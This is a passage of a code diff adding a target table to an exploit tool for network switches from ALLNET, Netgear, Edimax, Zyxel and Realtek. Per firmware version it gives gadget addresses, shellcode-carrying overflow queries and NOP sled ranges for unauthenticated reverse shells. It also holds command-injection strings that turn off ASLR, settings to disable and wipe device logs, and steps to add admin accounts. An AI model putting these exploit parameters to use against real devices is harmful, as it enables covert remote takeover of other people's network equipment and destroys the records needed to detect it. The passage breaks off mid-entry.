+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSntp_set':0x42BAE4,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSntpDel_set':0x42BAE4,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()
+						'sys_timeSettings_set':0x42BAE4,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'security.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
+						# We need these to push NOP and shellcode on higher heap addresses to avoid 0x00
+						'query': (self.random_string(1) +'=' + self.random_string(1) +'&') * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
+						#'query':'a=a&' * 110 + 'usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
+						'START':0x10010104,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP': 0x10600604,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 987,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 69,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# ALLNET GmbH Computersysteme 
+			# JSON based SG8xxx
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'752-76347': {
+				'model':'ALL-SG8208M',
+				'template':'ALLNET_JSON',					# Static for the vendor
+				'version':'2.2.1',						# Version / binary dependent stuff
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40C4FC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998528,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x248498dc,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+
+						'vulnerable': True,
+					},
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()
+						'log_settings_set':0x412ADC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()
+						'log_ramClear':0x412A24,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()
+						'log_fileClear':0x412A24,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntp_set':0x40FA74,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntpDel_set':0x40FA74,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSettings_set':0x40FA74,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# ALLNET GmbH Computersysteme 
+			# Not JSON based SG8xxx
+			# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology, Wanbroad, Plexonics, Mach Power, Gigamedia, TG-NET)
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : No
+			# Del /mntlog/flash.log  : No
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'222-50100': {
+				'template':'ALLNET',					# Static for the vendor
+				'version':'3.1.1-R3-B1',					# Version / binary dependent stuff
+				'model':'ALL-SG8310PM',				# Model
+				'uri':'https://www.allnet.de/en/allnet-brand/produkte/switches/entry-line-layer2-smart-managed-unamanged/poe-switches0/p/allnet-all-sg8310pm-smart-managed-8-port-gigabit-4x-hpoe',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40C74C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484029c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
+						'log_settings_set':0x46BB04,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_ramClear':0x46F240,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_fileClear':0x46F240,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntp_set':0x426724,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntpDel_set':0x426724,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
+						'sys_timeSettings_set':0x424D28,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable':False,
+					}, 
+
+					# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),
+					# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:
+					# 
+					# NOP's
+					# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00
+					# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF
+					'heack_cgi_shell': {
+						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
+						'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) +'_SHELLCODE',
+						'START':0x10010104,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP' :0x10600604,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 28,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 20,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+
+			#
+			# Netgear inc.
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : No (logging do not exist)
+			# Del /var/log/flash.log : No (logging do not exist)
+			# Del /mntlog/flash.log  : No (logging do not exist)
+			# Add credentials        : No (Single account only)
+			# Del credentials        : No (Single account only)
+			#
+			'609-31457': {
+				'template':'Netgear',						# Static for the vendor
+				'model':'GS750E ProSAFE Plus Switch',
+				'uri':'https://www.netgear.com/support/product/gs750e.aspx',
+				'version':'1.0.0.22',					# Version / binary dependent stuff
+				'login': {
+					'encryption':'caesar',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&password=PASSWORD&err_flag=0&err_msg=&submt=&_de=1":{}}',
+				},
+				'verify': { 
+						'set.cgi': {
+							'description':'Stack overflow in "password" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&password=' + self.random_string(320) + '&err_flag=0&err_msg=&submt=&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x4102F8,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f9984fc,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x24840c6c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_log': {
+						'vulnerable': False,
+					},
+					#
+					# Interesting, by adding 0xc1c1c1c1 to START/STOP, remote end will decode to our original START/STOP (including 0x00) =]
+					#
+					'heack_cgi_shell': {
+						'description':'Stack overflow in "password" (PoC: reverse shell)',
+						'authenticated': False,
+						'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+						'logout_uri':'/cgi/set.cgi?cmd=home_logout',
+						'cgi':'set.cgi',			# /sqfs/home/web/cgi-bin/security.cgi; main()
+						'START':0x10001210,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x10006210,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 50,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 79,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+						'query':'{"_ds=1&password=' + self.random_string(316) + '_RA_START&shellcode=_USRNOP_SHELLCODE&_de=1":{}}',
+						'workaround':False,	# My LAB workaround
+						'vulnerable': True,
+						'safe': True
+
+
+
+					},
+				},
+			},
+
+			#
+			# Netgear inc.
+			#
+			# Note: 
+			# 'username' is vulnerable for stack overflow
+			# 'pwd' use 'encode()' and not vulnerable for stack overflow (so we cannot jump with 'buffer method'...)
+			# Boa/Hydra 'getFdStr()' loop modified, original xploit dont work (0x00 are now ok), weird 'solution' to have $t9 loaded with JMP in 'fwrite()'
+			# 'hash=<MD5>' tailing all URI's
+			#
+			# CGI Reverse Shell      : No
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : No
+			# Del /var/log/flash.log : No
+			# Del /mntlog/flash.log  : No
+			# Add credentials        : No
+			# Del credentials        : No
+			#
+			'639-98866': {
+				'template':'Netgear',						# Static for the vendor
+				'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',
+				'uri':'https://kb.netgear.com/000060184/GS728TPv2-GS728TPPv2-GS752TPv2-GS752TPP-Firmware-Version-6-0-0-45',
+				'version':'6.0.0.45',					# Version / binary dependent stuff
+				'info_leak':False,
+				'hash_uri':True,	# tailed 'hash=' md5 hashed URI as csrf token
+				'login': {
+					'encryption':'encode',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&pwd=PASSWORD&err_flag=0&err_msg=&submt=&_de=1":{}}',
+				},
+				'verify': { 
+						'set.cgi': {
+							'description':'Stack overflow in "username" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+														# 
+						'gadget': 0x45678C,				# Direct heap address for NOP slep and shellcode
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99853c,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484ae5c,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
+						'safe': False
+					},
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+				},
+			},
+
+			'639-73124': {
+				'template':'Netgear',						# Static for the vendor
+				'model':'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP',
+				'uri':'https://www.netgear.com/support/product/GS752TPv2#Firmware%20Version%206.0.0.37',
+				'version':'6.0.0.37',					# Version / binary dependent stuff
+				'info_leak':False,
+				'hash_uri':True,	# tailed 'hash=' md5 hashed URI as csrf token
+				'login': {
+					'encryption':'encode',
+					'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
+					'query':'{"_ds=1&username=USERNAME&pwd=PASSWORD&err_flag=0&err_msg=&submt=&_de=1":{}}',
+				},
+				'verify': { 
+						'set.cgi': {
+							'description':'Stack overflow in "username" (PoC: crash CGI)',
+							'authenticated': False,
+							'response':'502',
+							'Content-Type':False,
+							'uri':'/cgi/set.cgi?cmd=home_loginAuth',
+							'content':'{"_ds=1&username='+ self.random_string(100) +'&pwd=NOP&err_flag=0&err_msg=&submt=&_de=1":{}}',
+							'check_uri':False,
+							'content_check':False,
+							'vulnerable': True,
+							'safe': True
+						},
+				},
+				'exploit': {
+					'heack_hydra_shell': {
+														# 
+						'gadget': 0x45778C,				# Direct heap address for NOP slep and shellcode
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998538,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484afec,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 6,						# Should leave as-is (but you can play between 5 - 8)
+						'safe': False
+					},
+					'stack_cgi_diag': {
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+				},
+			},
+
+			#
+			# EdimaxPRO
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : Yes
+			# Del /mntlog/flash.log  : Yes
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'225-63242': {
+				'template':'Edimax',					# Static for the vendor
+				'model':'GS-5424PLC',
+				'uri':'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc',
+				'version':'1.1.1.5',					# Version / binary dependent stuff
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998524,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x248411bc,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()
+						# traceroute
+						'web_sys_ping_post':0x40DFF4,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
+						'sys_ping_post_check':'',
+
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
+						'log_settings_set':0x41D99C,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_ramClear':0x41D8E4,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_fileClear':0x41D8E4,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntp_set':0x41620C,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntpDel_set':0x41620C,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSettings_set':0x41620C,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': False,			# Not clear, may be to long URI for the stack
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,
+					},
+				},
+			},
+			'225-96283': {
+				'template':'Edimax',					# Static for the vendor
+				'model':'GS-5424PLC',
+				'uri':'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc',
+				'version':'1.1.1.6',					# Version / binary dependent stuff
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998524,			# la $t9, system # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x248411ac,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+														# /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()
+						# traceroute
+						'web_sys_ping_post':0x40E024,	# Jump one after 'sw $ra'			# (address, binary dependent)
+						'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',
+						'sys_ping_post_check':'',
+
+						'verify_uri':'/tmp/check',
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()
+						'log_settings_set':0x41D9EC,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_ramClear':0x41D934,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()
+						'log_fileClear':0x41D934,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntp_set':0x416254,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSntpDel_set':0x416254,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()
+						'sys_timeSettings_set':0x416254,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'set.cgi',				# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()
+						'START':0x7ffeff04,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP':0x7fc60000,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 64,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 77,					# filler/garbage (not used for something constructive)
+						'align': 3,						# Align opcodes in memory
+						'stack':True,					# NOP and shellcode lays on: True = stack, False = Heap
+						'vulnerable': True,				# 
+					},
+				},
+			},
+
+			#
+			# Zyxel
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : No
+			# Del /mntlog/flash.log  : No
+			# Add credentials        : Yes (adding username to next free index number, may not be #1)
+			# Del credentials        : Yes (index number instead of username, may not be #1)
+			#
+			'222-71560': {
+				'template':'Zyxel',					# Static for the vendor
+				'version':'2.40_AAHL.1_20180705',	# Version / binary dependent stuff
+				'model':'GS1900-24',				# Model
+				'uri':'https://www.zyxel.com/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40D60C,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f998520,			# la $t9, system) # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x2484e148,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,				# 
+					},
+					#
+					#
+					'stack_cgi_diag': {				# Not vulnerable
+						'address':0x4341C4,
+						'vulnerable': False,
+					},
+					'stack_cgi_add_account': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_localUser_post()
+						'address':0x436D9C,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&usrName=USERNAME&usrPrivType=15&usrPriv=15',			# Admin, priv 15
+						'vulnerable': True,
+					},
+					'stack_cgi_del_account': { #
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_localUserDel_post()
+						'address':0x437124,				# Jump one after 'sw $ra'			# (address, binary dependent)
+						'account':'&_del=1',			# First additional user in the list
+						'vulnerable': True,				# user
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
+						'log_settings_set':0x47D760,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_delete_post()
+						'log_ramClear':0x480804,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_delete_post()
+						'log_fileClear':0x480804,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,				# 
+					},
+					'stack_cgi_sntp': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntp_set':0x43BA8C,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntpDel_set':0x43BA8C,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
+						'sys_timeSettings_set':0x43AF54,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable':False,
+					}, 
+					'heack_cgi_shell': {
+						'cgi':'dispatcher.cgi',			# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()
+						'query':'username='+ self.random_string(100) +'_RA_START&password='+ self.random_string(59) +'&STARTUP_BACKUP=1'+ (('&' + struct.pack('>L',0x2404FF3D) + struct.pack('>L',0x2404FFFF)) * 70) + '&' + struct.pack('>L',0x2404FF3D) +'_SHELLCODE',
+						'START':0x10010104,				# start: Stack overflow RA, used for searching NOP sled by blind jump
+						'STOP': 0x104006A0,				# end: You may want to play with this if you dont get it working
+						'usr_nop': 25,					# NOP sled (shellcode will be tailed)
+						'pwd_nop': 15,					# filler/garbage (not used for something constructive)
+						'align': 0,						# Align opcodes in memory
+						'stack':False,					# NOP and shellcode lays on: True = stack, False = Heap
+					},
+				},
+			},
+
+			#
+			# Realtek
+			#
+			# CGI Reverse Shell      : Yes
+			# Boa/Hydra reverse shell: Yes
+			# Del /var/log/ram.log   : Yes
+			# Del /var/log/flash.log : No
+			# Del /mntlog/flash.log  : No
+			# Add credentials        : Yes
+			# Del credentials        : Yes
+			#
+			'222-40570': {
+				'template':'Realtek',					# Static for the vendor
+				'version':'3.0.0.43126',				# Version / binary dependent stuff
+				'model':'RTL8380-24GE-4GEC',			# Model
+				'uri':'https://www.realtek.com/en/products/communications-network-ics/item/rtl8381m-vb-cg-2',
+				'exploit': {
+					'heack_hydra_shell': {
+														# /sqfs/bin/boa; embedparse() 
+						'gadget': 0x40E6DC,				# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)
+														# /sqfs/bin/boa; read_body(); 
+						'system': 0x8f99851c,			# la $t9, system) # opcode, binary dependent
+														# /sqfs/bin/boa; read_body(); 
+						'handler': 0x24841ea8,			# addiu $a0, (.ascii "handler -c boa &" - 0x430000) # (opcode, binary dependent)
+						'v0': 7,						# Should leave as-is (but you can play between 5 - 8)
+						'vulnerable': True,
+					},
+					'stack_cgi_add_account': {
+						'vulnerable': False,
+					},
+					'stack_cgi_del_account': { #
+						'vulnerable': False,
+					},
+					'stack_cgi_diag': {
+						# Ping IPv4
+						'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
+						'verify_uri':'/tmp/pingtest_tmp',
+						'web_sys_ping_post':0x422980,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_ping_post()
+
+						# traceroute
+						#'web_sys_ping_post':0x423168,	# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_trace_route_post()
+						#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',
+						#'verify_uri':'/tmp/traceroute_tmp',
+						'vulnerable': True,
+					},
+					'stack_cgi_log': {
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()
+						'log_settings_set':0x481968,	# Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_ramClear':0x4847DC,		# Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_file_del()
+						'log_fileClear':0x4847DC,		# Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)
+						'vulnerable': True,
+					},
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+					'stack_cgi_sntp': {
+						'sys_timeSntp_set':0x42C8F0,	# Jump one after 'sw $ra'			# Set SNTP Server (Inject CMD)
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()
+						'sys_timeSntpDel_set':0x42C8F0,	# Jump one after 'sw $ra'			# Delete (address, binary dependent) 
+														# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()
+						'sys_timeSettings_set':0x42C8F0,# Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)
+						'vulnerable': True,
+					}, 
+					'heack_cgi_shell': {
